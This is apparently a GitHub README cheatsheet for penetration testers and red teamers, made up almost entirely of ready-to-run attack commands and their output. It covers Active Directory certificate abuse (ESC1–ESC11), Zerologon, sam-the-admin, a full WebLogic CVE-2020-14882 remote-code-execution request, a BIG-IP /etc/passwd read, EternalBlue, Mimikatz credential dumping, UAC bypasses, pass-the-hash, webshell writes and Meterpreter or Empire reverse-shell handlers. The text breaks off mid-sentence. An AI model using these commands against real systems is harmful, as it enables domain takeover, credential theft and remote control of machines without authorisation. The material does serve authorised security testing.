# A Red-Teamer diaries <p align="center"> <img src="https://www.welivesecurity.com/wp-content/uploads/2014/05/rooftop-1024x576.png"/> </p> Publicly accessible notes about my pentesting/red teaming experiments tested on several controlled environments/infrastructures that involve playing with various tools and techniques used by penetration testers and redteamers during a security assessment. - [x] Project in progress ### Contribute We welcome contributions as github pull requests.<br> Kudos and thanks for the people who did the hard stuff </br> ### Goals * Pentest/red team cheatsheet that collects snippets of codes and commands to help pentester during an engagement(saving time/fast search for a specific command). * Understand how the attacks can be performed * take notes for future reference > #### Disclaimer > For educational purposes only, use it at your own responsibility. ## Intrusion Kill Chain <p align="center"> <img src="https://camo.githubusercontent.com/9547d8152e3490a6e5e3da0279faab64340885be/68747470733a2f2f646f63732e6d6963726f736f66742e636f6d2f656e2d75732f616476616e6365642d7468726561742d616e616c79746963732f6d656469612f61747461636b2d6b696c6c2d636861696e2d736d616c6c2e6a7067" alt="KillChain"/> </p> # Mapping the Network ## RunFinger.py Gather information about the Domain name and windows machine running in the network ```bash bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i 192.168.1.1/24 ``` or ```bash bash$ responder-RunFinger ``` ## Nbtscan Scanning IP networks for NetBIOS name information. ```bash bash$ sudo nbtscan -v -s : 192.168.1.0/24 ``` ## Crackmapexec v 4.0 Scan the network range based on the SMB information ```bash bash$ cme smb 192.168.1.1/24 ``` ## Nmap scan Scan all the machine network and save the outputs . * -oA options : Means output with all format * -T4 : Fast scan Fast Scan ```bash bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP ``` Intensive Scan (Note recommended): ```bash bash$ nmap -p 1-65535 -Pn -A -oA output target_IP ``` Scan with enumeration of the running services version : * -sC : default scripts Equivalent to --script=default * -sV : Get the service version ```bash bash$ nmap -sC -sV -oA output target ``` ## Angry IP scanner Download the tool from this link : [Angry IP Scanner](http://angryip.org/download/#linux) * Change the preferences settings > Go to : Preferences -> Ports -> add 80,445,554,21 ,22 in the port selection <br> > Go to : Preferences -> Display -> select Alive Hosts <br> > Go to : Preferences -> Pinging -> select Combained (UDP/TCP) # Lateral Movement and Exploitation ### Active Directory Certificate Services This part was copied from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#esc1---misconfigured-certificate-templates <br>For more details check : https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation (Tested on private environment (Bloodhound then ESC1 exploit) * Find ADCS Server * `crackmapexec ldap domain.lab -u username -p password -M adcs` * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` * Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump` #### ESC1 - Misconfigured Certificate Templates > Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject. Requirements: * Template that allows for AD authentication * **ENROLLEE_SUPPLIES_SUBJECT** flag * [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage) Exploitation: * Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates ```ps1 Certify.exe find /vulnerable Certify.exe find /vulnerable /currentuser # or PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' # or certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound ``` * Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate) ```ps1 # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt. Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --alt-name han --template UserSAN certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]' ``` * Use OpenSSL and convert the certificate, do not enter a password ```ps1 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ``` * Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus ```ps1 Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx ``` **WARNING**: These certificates will still be usable even if the user or computer resets their password! **NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints. #### ESC2 - Misconfigured Certificate Templates Requirements: * Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) Exploitation: * Find template ```ps1 PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local' ``` * Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). #### ESC3 - Misconfigured Enrollment Agent Templates > ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users * Request a certificate based on the vulnerable certificate template ESC3. ```ps1 $ certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC3' [*] Saved certificate and private key to 'john.pfx' ``` * Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user ```ps1 $ certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx' ``` #### ESC4 - Access Control Vulnerabilities > Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability * Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate) ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl ``` * Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1 ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. C:\>StandIn.exe --adcs --filter WebServer --ess --add ``` * Perform ESC1 and then restore the value ```ps1 python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag ``` Using Certipy ```ps1 # overwrite the configuration to make it vulnerable to ESC1 certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old # request a certificate based on the ESC4 template, just like ESC1. certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC4' -alt '[email protected]' # restore the old configuration certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json ``` #### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 > If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. Exploitation: * Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. ```ps1 Certify.exe cas ``` * Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names ```ps1 .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin ``` Mitigation: * Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` #### ESC7 - Vulnerable Certificate Authority Access Control Exploitation: * Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions ```ps1 Certify.exe find /vulnerable ``` * Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6) ```ps1 Certify.exe setconfig /enablesan /restart ``` * Request the certificate with the desired SAN. ```ps1 Certify.exe request /template:User /altname:super.adm ``` * Grant approval if required or disable the approval requirement ```ps1 # Grant Certify.exe issue /id:[REQUEST ID] # Disable Certify.exe setconfig /removeapproval /restart ``` Alternative exploitation from **ManageCA** to **RCE** on ADCS server: ```ps1 # Get the current CDP list. Useful to find remote writable shares: Certify.exe writefile /ca:SERVER\ca-name /readonly # Write an aspx shell to a local web directory: Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx # Write the default asp shell to a local web directory: Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp # Write a php shell to a remote web directory: Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php ``` #### ESC8 - AD CS Relay Attack > An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controllerโ€™s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) * **Version 1**: NTLM Relay + Rubeus + PetitPotam ```powershell impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate # For a member server or workstation, the template would be "Computer". # Other templates: workstation, DomainController, Machine, KerberosAuthentication # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN git clone https://github.com/topotam/PetitPotam python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP python3 dementor.py <listener> <target> -u <username> -p <password> -d <domain> python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local # Use the certificate with rubeus to request a TGT Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt # Now you can use the TGT to perform a DCSync mimikatz> lsadump::dcsync /user:krbtgt ``` * **Version 2**: NTLM Relay + Mimikatz + Kekeo ```powershell impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController # Mimikatz mimikatz> misc::efs /server:dc.lab.local /connect:<IP> /noauth # Kekeo kekeo> base64 /input:on kekeo> tgt::ask /pfx:<BASE64-CERT-FROM-NTLMRELAY> /user:dc$ /domain:lab.local /ptt # Mimikatz mimikatz> lsadump::dcsync /user:krbtgt ``` * **Version 3**: Kerberos Relay ```ps1 # Setup the relay sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine # Run mitm6 sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v ``` * **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed. ```powershell https://github.com/bats3c/ADCSPwn adcspwn.exe --adcs <cs server> --port [local port] --remote [computer] adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local # ADCSPwn arguments adcs - This is the address of the AD CS server which authentication will be relayed to. secure - Use HTTPS with the certificate service. port - The port ADCSPwn will listen on. remote - Remote machine to trigger authentication from. username - Username for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. ``` * **Version 5**: Certipy ESC8 ```ps1 certipy relay -ca 172.16.19.100 ``` #### ESC9 - No Security Extension Requirements: * `StrongCertificateBindingEnforcement` set to `1` (default) or `0` * Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value * Certificate specifies `Any Client` authentication EKU * `GenericWrite` over any account A to compromise any account B **Scenario** [email protected] has **GenericWrite** over [email protected], and we want to compromise [email protected]. [email protected] is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value. * Obtain the hash of Jane with Shadow Credentials (using our GenericWrite) ```ps1 certipy shadow auto -username [email protected] -p Passw0rd -account Jane ``` * Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part ```ps1 certipy account update -username [email protected] -password Passw0rd -user Jane -upn Administrator ``` * Request the vulnerable certificate template ESC9 from Jane's account. ```ps1 certipy req -username [email protected] -hashes ... -ca corp-DC-CA -template ESC9 # userPrincipalName in the certificate is Administrator # the issued certificate contains no "object SID" ``` * Restore userPrincipalName of Jane to [email protected]. ```ps1 certipy account update -username [email protected] -password Passw0rd -user [email protected] ``` * Authenticate with the certificate and receive the NT hash of the [email protected] user. ```ps1 certipy auth -pfx administrator.pfx -domain corp.local # Add -domain <domain> to your command line since there is no domain specified in the certificate. ``` #### ESC11 - Relaying NTLM to ICPR > Encryption is not enforced for ICPR requests and Request Disposition is set to Issue Requirements: * [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork * [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork Exploitation: 1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u [email protected] -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output 2. Setup a relay using Impacket ntlmrelay and trigger a connection to it. ```ps1 ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support ``` --- # PRE-CREATED COMPUTER ACCOUNTS ### FINDING PRE-CREATED COMPUTER ACCOUNTS For instance, the computer account `DavesLaptop$` would have the password `daveslaptop` - Note that when dealing with computer accounts, it is smart to escape the `$` with a `\`. ```bash impacket-smbclient <domain>/<computer account>\$:<password>@<IP> Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] SMB SessionError: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT(The account used is a computer account. Use your global user account or local user account to access this server.) ``` Notice we have `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT` ### Change The Password We can use either of these: - https://github.com/fortra/impacket/blob/master/examples/changepasswd.py - https://github.com/api0cradle/impacket/blob/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py ```bash python3 rpcchangepwd.py <domain>/<computer account>\$:<password>@<IP> -newpass P@ssw0rd 31s Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Password was changed successfully. ``` ### Connect to SMB with the new creds ```bash impacket-smbclient <domain>/<computer account>\$:<new set password>@<IP> Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation Type help for list of commands # ``` **- Reference : https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/** --- ### Exploiting CVE-2021-42278 and CVE-2021-42287 Download the epxloit script https://github.com/WazeHell/sam-the-admin ```bash bash$ python3 sam_the_admin.py "<domain_name>/<username>:<password>" -dc-ip <DC_IP> ``` If the AD is vulnerable we will have the following output: <img src="https://raw.githubusercontent.com/ihebski/A-Red-Teamer-diaries/master/zerologon/1639322935010.jpeg" alt="AD exploit"> ### Scanning for Zerologon SecuraBV zerologon scanner https://github.com/SecuraBV/CVE-2020-1472<br> We can use crackmapexec to extract the DC name ```bash bash$ python3 zerologon_tester.py EXAMPLE-DC 1.2.3.4 ``` If the target is vulnerable the scanner showing the following output: <img src="https://github.com/ihebski/A-Red-Teamer-diaries/blob/master/zerologon/scanner.png" alt="zerologon scanner"> ### Exploiting zerologon - The exploit could reset the domain admin password we can use zer0dump exploit instead https://github.com/bb00/zer0dump - Dumping The admin password (change the username if only one user is targetted ) <img src="https://github.com/ihebski/A-Red-Teamer-diaries/blob/master/zerologon/dump-Administrator-Password.png" alt="dump NTLM" > Getting an RCE through pass-the-hash <img src="https://github.com/ihebski/A-Red-Teamer-diaries/blob/master/zerologon/get_RCE_psexec.png" alt="RCE"> > The provided screenshots are related to a personnel lab used for the POC test only, be careful when running the exploit on DC in PROD(during an engagement) ## BIGIP F5 CVE-2020-5902 Check if the target is vulnerable ```bash curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` We can scan the target using Nuclei or Nmap too * Nuclei https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```bash nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -target https://<IP> ``` If multiple hosts are specified use -l argument -> -l bigip-assets.txt * Nmap ```bash wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ``` #### BIGIP RCE we can use Metasploit Module https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 ## Scanning Weblogic CVE-2020-14882 Nuclei Module ```bash nuclei -t nuclei-templates/cves/CVE-2020-14882.yaml -target http://<IP> ``` This module sometimes fails, use -proxy-url http://127.0.0.1:8080 to redirect traffic into Burpsuite and investigate. ## Exploiting Weblogic CVE-2020-14882 - RCE ```bash POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: 172.16.242.134:7001 cmd: chcp 65001&&whoami&&ipconfig User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1258 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); ``` * Change cmd in the request header with any system command(Win/Linux) * Payload could be turned into a curl command. ## Scanning for EternalBlue ms17-010 ```bash bash$ nmap -p445 --script smb-vuln-ms17-010 <target>/24 ``` If the target is vulnrable the output is as following Script Output<br> Host script results: ```bash | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ ``` ## Exploiting Eternal Blue - Metasploit Module (Windows 7 x64 only ) * Note : <br>The default Module supported by Metasploit is exploiting only windows 7 x64 bit Otherwise the target will be crashed . ```bash msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show targets ...targets... msf exploit(ms17_010_eternalblue) > set TARGET <target-id> msf exploit(ms17_010_eternalblue) > show options ...show and set options... msf exploit(ms17_010_eternalblue) > exploit ``` ## Mimikatz - Metasploit After obtaining a meterpreter shell, we need to ensure that our session is running with **SYSTEM level privileges** for Mimikatz to function properly. ```bash meterpreter > getuid Server username: WINXP-E95CE571A1\Administrator meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` ### Reading Hashes and Passwords from Memory ```bash meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f } 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;56683 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO) meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;56683 NTLM 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword meterpreter > mimikatz_command -f sekurlsa::searchPasswords [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword } meterpreter > mimikatz_command -f sekurlsa::logonpasswords ``` ## Mimikatz on Linux In case no VM is available ### step 1 ```bash winetricks msasn1 ``` ### step 2 ```bash โ•ฐโ”€>$ wine /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe 0009:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution. .#####. mimikatz 2.2.0 (x86) #18362 May 13 2019 01:34:39 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # ``` # Privilege Escalation of Windows ### JuicyPotato ```bash JuicyPotato.exe -l <PORT> -p c:\windows\system32\cmd.exe -t * ``` ### Migrate Process ```bash msf > ps msf exploit(bypassuac) > migrate <pid> ``` ### Windows Escalate UAC Protection Bypass ```bash msf > use exploit/windows/local/bypassuac msf exploit(bypassuac) > set session 1 msf exploit(bypassuac) > exploit ``` ### Windows Escalate UAC Protection Bypass (In Memory Injection) ```bash msf > use exploit/windows/local/bypassuac_injection msf exploit(bypassuac_injection) > set session 1 msf exploit(bypassuac_injection) > exploit ``` ### Windows Escalate UAC Protection Bypass (Script Host Vulnerability) ```bash msf > use windows/local/bypassuac_vbs msf exploit(bypassuac_vbs) > set session 1 msf exploit(bypassuac_vbs) > exploit ``` ### Windows Escalate UAC Execute RunAs ```bash msf > use windows/local/ask msf exploit(ask) > set session 1 msf exploit(ask) > exploit ``` ### MS16-032 Secondary Logon Handle Privilege Escalation Windows 7 32 bit ```bash msf > use windows/local/ms16_032_secondary_logon_handle_privesc msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1 msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit ``` ### Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) ```bash msf exploit(ms13_053_schlamperei) >set session 1 msf exploit(ms13_053_schlamperei) >exploit ``` ## Crackmapexec V4.0 Enemurate target ``` bash$ cme smb <target> ``` Access to machine by valid username/password ``` bash$ cme smb <target> -u username -p password ``` Access to machine using the NTLM hash (if u see PWN3D the user hash administrator priveleges ) ``` bash$ cme smb <target> -u username -H hash ``` Listing shares ``` bash$ cme smb <target> -u username -p password --shares ``` Enumerate active sessions ``` bash$ cme smb <target> -u username -p password --sessions ``` Enumerate users by bruteforcing RID's (default: 4000) ``` bash$ cme smb <target> -u username -p password --rid-brute ``` Execute the specified command ``` bash$ cme smb <target> -u username -p password -x 'whoami' ``` Execute the specified PowerShell command ``` bash$ cme smb <target> -u username -p password -X 'whoami' ``` Get Hashes ``` bash$ cme smb <target> -u username -p password --sam ``` ## Crackmapexec to Empire agent First setup an Empire listener: ``` (Empire: listeners) > set Name test (Empire: listeners) > set Host 192.168.10.3 (Empire: listeners) > set Port 9090 (Empire: listeners) > set CertPath data/empire.pem (Empire: listeners) > run (Empire: listeners) > list [*] Active listeners: ID Name Host Type Delay/Jitter KillDate Redirect Target -- ---- ---- ------- ------------ -------- --------------- 1 test http://192.168.10.3:9090 native 5/0.0 (Empire: listeners) > ``` Start up Empire's RESTful API server: ``` #~ python empire --rest --user empireadmin --pass Password123! [*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/ * Starting Empire RESTful API on port: 1337 * RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml * Running on https://0.0.0.0:1337/ (Press CTRL+C to quit) ``` The username and password that CME uses to authenticate to Empire's RESTful API are stored in the cme.conf file located at ~/.cme/cme.conf: ``` [Empire] api_host=127.0.0.1 api_port=1337 username=empireadmin password=Password123! [Metasploit] rpc_host=127.0.0.1 rpc_port=55552 password=abc123 ``` Then just run the empire_exec module and specify the listener name: ``` #~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test ``` # Crackmapexec to Meterpreter We can use the metinject module to directly inject meterpreter into memory using PowerSploit's Invoke-Shellcode.ps1 script. First setup your handler: ``` msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 192.168.10.3 LHOST => 192.168.10.3 msf exploit(handler) > set exitonsession false exitonsession => false msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://192.168.10.3:8443 msf exploit(handler) > [*] Starting the payload handler... ``` Then just run the metinject module and specify the LHOST and LPORT values: ``` #~ crackmapexec 192.168.10.0/24 -u username -p password -M metinject -o LHOST=192.168.1 ``` # Passing shell from Empire to Meterpreter metasploit metasploit listner options ``` msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http msf exploit(handler) > set lhost 192.168.1.110 lhost => 192.168.1.110 msf exploit(handler) > set lport 2286 lport => 2286 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set SessionCommunicationTimeout 0 SessionCommunicationTimeout => 0 msf exploit(handler) > exploit -j ``` Setup Empire to send the agent to Metasploit ``` use module code_execution/shellcode_inject set Host <ip> set Port <port> execute ``` # DeathStar ``` # Start the Empire console and RESTful API python empire --rest --username empireadmin --password Password123 ``` Then grab, setup and run DeathStar: ``` git clone https://github.com/byt3bl33d3r/DeathStar # Death Star is written in Python3 pip3 install -r requirements.txt ./DeathStar.py ``` # Windows cmd.exe commands ## Add user ``` net user /add [username] [password] ``` ## Add User as an admin ``` net localgroup administrators [username] /add ``` ## Add user to RDP group ``` NET LOCALGROUP "Remote Desktop Users" keyoke /ADD ``` # PTH_winexe : open shell without psexec Example :<br> ``` pth-winexe -U DOMAIN/USERNAME%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb //IP_Server cmd.exe ``` Real Example :<br> ``` pth-winexe -U LAB/Administrator%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb //192.168.1.44 cmd.exe ``` # PTH-winexe to Meterpreter ``` msf exploit(web_delivery) > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 2 target => 2 msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(web_delivery) > set L set LHOST set LISTENERCOMM set LOGLEVEL set LPORT msf exploit(web_delivery) > set LHOST 127.0.0.1 LHOST => 127.0.0.1 msf exploit(web_delivery) > set LPORT 1233 LPORT => 1233 msf exploit(web_delivery) > exploit [*] Exploit running as background job 0. [!] You are binding to a loopback address by setting LHOST to 